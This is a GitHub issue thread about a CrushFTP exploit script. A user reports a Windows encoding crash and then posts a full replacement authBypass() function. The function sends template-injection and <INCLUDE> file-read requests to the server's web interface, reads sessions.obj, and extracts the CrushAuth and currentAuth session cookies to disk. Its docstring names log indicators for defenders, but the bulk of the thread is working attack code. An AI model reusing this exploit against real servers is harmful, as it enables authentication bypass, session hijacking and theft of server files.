
codec error \ufffd #3

Open
Hina-kari opened this issue May 18, 2024 · 1 comment

@Hina-kari

Traceback (most recent call last):
File "C:\Users\PC\Downloads\crushed.py", line 267, in <module>
main()
File "C:\Users\PC\Downloads\crushed.py", line 260, in main
extracted_crush_auth, extracted_current_auth = authBypass(target=args.target, crush_auth_cookie=crush_auth_cookie, current_auth_cookie=current_auth_cookie, lfi=args.lfi, session=session)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "C:\Users\PC\Downloads\crushed.py", line 167, in authBypass
f.write(response.text)
File "C:\Program Files\WindowsApps\PythonSoftwareFoundation.Python.3.12_3.12.1008.0_x64__qbz5n2kfra8p0\Lib\encodings\cp1252.py", line 19, in encode
return codecs.charmap_encode(input,self.errors,encoding_table)[0]
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
UnicodeEncodeError: 'charmap' codec can't encode character '\ufffd' in position 790: character maps to <undefined>

@Hina-kari
Author

Fixed the error.

Replace authBypass() with this:
`def authBypass(target, crush_auth_cookie, current_auth_cookie, session, lfi=None):
    """Run the two-request sequence this proof-of-concept sends to a CrushFTP web interface.

    Request 1 is a POST to ``/WebInterface/function/`` with ``command=zip`` and
    the literal token ``{working_dir}`` in the ``path`` parameter. If the token
    comes back unexpanded in the response body, the function reports the server
    as not vulnerable and exits. Request 2 repeats the POST with
    ``path=<INCLUDE>file</INCLUDE>`` to read ``lfi``, or
    ``<install_dir>sessions.obj`` when ``lfi`` is not given.

    For defenders: the strings ``command=zip`` together with ``{working_dir}``
    or ``<INCLUDE>`` in the ``path`` query parameter of requests to
    ``/WebInterface/function/`` are the request-line indicators this code
    produces, so they are what to look for in web access logs.

    Args:
        target: Prefix the request URLs are built on.
        crush_auth_cookie: Value sent as the ``CrushAuth`` cookie.
        current_auth_cookie: Value sent as the ``currentAuth`` cookie and as
            the ``c2f`` query parameter.
        session: Object whose ``post`` method sends the requests
            (presumably a ``requests.Session`` -- confirm against the caller).
        lfi: Optional path of the file to read instead of ``sessions.obj``.

    Returns:
        A pair of lists (``CrushAuth`` values, ``currentAuth`` values) when the
        session file was read; ``(None, None)`` when the second request did not
        yield it or another file was requested; a bare ``None`` when no
        ``file:`` entry was found or the first response was not a non-empty 200.
    """

    console.print(f"[green][*][/green] Attempting to bypass authentication...")

    # The doubled braces make the f-string emit the literal text {working_dir}.
    url = f"{target}/WebInterface/function/?c2f={current_auth_cookie}&command=zip&path={{working_dir}}&names=/a"
    console.print(f"\n[green][+][/green] URL: " + url)
    headers = {
        "Cookie": f"CrushAuth={crush_auth_cookie}; currentAuth={current_auth_cookie}"
    }

    try:
        # verify=False turns off TLS certificate validation for this request.
        response = session.post(url, headers=headers, verify=False, allow_redirects=True)
    
        # The token echoed back unchanged means the server did not expand it.
        if "{working_dir}" in response.text:
            console.print(f"[red][-][/red] Bypass was not successful, server is not vulnerable.")
            console.print(f"[red][-][/red] Response: " + response.text)
            exit(1)

        if response.status_code == 200 and response.text != "":
            console.print(f"[green][+][/green] Extracted response: \n" + response.text)

            # The body is parsed as XML; the text of its <response> element is
            # searched for "file:" entries and the last one is used as the
            # installation directory.
            root = ET.fromstring(response.text)
            response_text = root.find('response').text
            matches = re.findall(r'file:(.*?)(?=\n|$)', response_text)            
            if matches:
                install_dir = matches[-1].strip()
                console.print(f"[green][+][/green] Installation directory of CrushFTP: " + install_dir)
                file_to_read = lfi if lfi else f"{install_dir}sessions.obj"
                console.print(f"[green][+][/green] File to read: " + file_to_read)
                
                url = f"{target}/WebInterface/function/?c2f={current_auth_cookie}&command=zip&path=<INCLUDE>{file_to_read}</INCLUDE>&names=/a"
                console.print(f"\n[green][+][/green] Attempting to extract {file_to_read}...")
                console.print(f"\n[green][+][/green] URL: " + url)
                response = session.post(url, headers=headers, verify=False, allow_redirects=True)

                if response.status_code == 200 and response.text != "":
                    console.print(f"[green][+][/green] Successfully extracted {file_to_read}")
                    # Square brackets are backslash-escaped before printing,
                    # presumably so the console does not read them as markup.
                    escaped_text = response.text.replace("[", "\\[").replace("]", "\\]")

                    console.print(f"[green][+][/green] Extracted response: \n" + escaped_text)
                    if not lfi or lfi == f"{install_dir}sessions.obj":
                        # Each match is truncated: 44 characters for CrushAuth,
                        # 4 for currentAuth.
                        extracted_crush_auth = [cookie[:44] for cookie in re.findall(r'CrushAuth=([^;]*)', response.text)]
                        extracted_current_auth = [cookie[:4] for cookie in re.findall(r'currentAuth=([^;]*)', response.text)]

                        console.print(f"\n[green][+][/green] Extracted cookies from {file_to_read}: ")
                        console.print(f"\n[green][+][/green] [yellow2]CrushAuth cookies:[/yellow2] " + ', '.join(extracted_crush_auth))
                        console.print(f"\n[green][+][/green] [yellow2]currentAuth cookies: [/yellow2]" + ', '.join(extracted_current_auth))
                        # encoding="utf-8" is the fix from this issue: the
                        # Windows default codec (cp1252) cannot encode U+FFFD,
                        # which appeared in the response text. The file is
                        # written to the current directory and holds the
                        # session cookie values matched above, so it is
                        # sensitive.
                        with open (f"sessions.obj", "w", encoding="utf-8") as f:
                            f.write(response.text)
                        return extracted_crush_auth, extracted_current_auth
                return None, None
            else:
                # NOTE(review): this branch uses print, not console.print, and
                # returns a bare None although the caller in the traceback
                # unpacks two values.
                print(f"[red][-][/red] Failed to extract file value")
                return None
            
    except requests.exceptions.RequestException as e:
        # Any transport-level failure ends the process with status 1.
        console.print(f"[red][-][/red] Failed to bypass authentication")
        console.print(f"[red][-][/red] Error: " + str(e))
        exit(1)`

The change: the output file is now opened with encoding="utf-8", because the Windows default codec (cp1252) cannot encode '\ufffd'.
